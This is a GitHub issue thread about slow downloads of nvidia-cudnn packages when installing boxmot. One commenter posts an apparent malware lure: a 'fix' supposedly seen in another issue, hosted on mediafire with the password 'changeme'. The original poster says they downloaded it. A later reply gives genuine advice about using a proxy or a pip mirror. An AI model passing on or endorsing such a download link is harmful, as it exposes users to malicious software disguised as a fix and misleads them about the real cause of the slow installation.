### ISSUE TITLE
安装问题

### ISSUE THREAD

**Issue by Zc229** [mikel-brostrom/boxmot#1593]
### Search before asking

- [X] I have searched the Yolo Tracking [issues](https://github.com/mikel-brostrom/yolo_tracking/issues) and found no similar bug report.

### Question

![1724725638242](https://github.com/user-attachments/assets/67c38479-4fa1-49d7-90b1-e17f524e54f5)
请问安装过程中貌似有较多nvidia-cudnn类的包，下载时长较慢，这是正常的吗

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Zc229** [comment]
> 要解决您的问题，请尝试下载此修复程序，我在另一个问题中看到它， https://app.mediafire.com/3ag3jpquii3of 密码：changeme 当您安装时，您需要在安装路径中放置一个检查并选择“gcc”。

我已经下载该fixer，那么pip install boxmot时我应该如何修改这句代码？

**Comment by LanluZ** [comment]
如果是在国内互联网(CN)裸连下载属于正常现象
对于下载速度慢可以尝试以下方案:
1. 开启或者更换代理工具
2. 设置pip镜像源

---

If it is in the domestic Internet (CN) bare connection download is a normal phenomenon
For slow download speed, you can try the following solutions.
1. open or replace the proxy tool
2. set pip mirror source
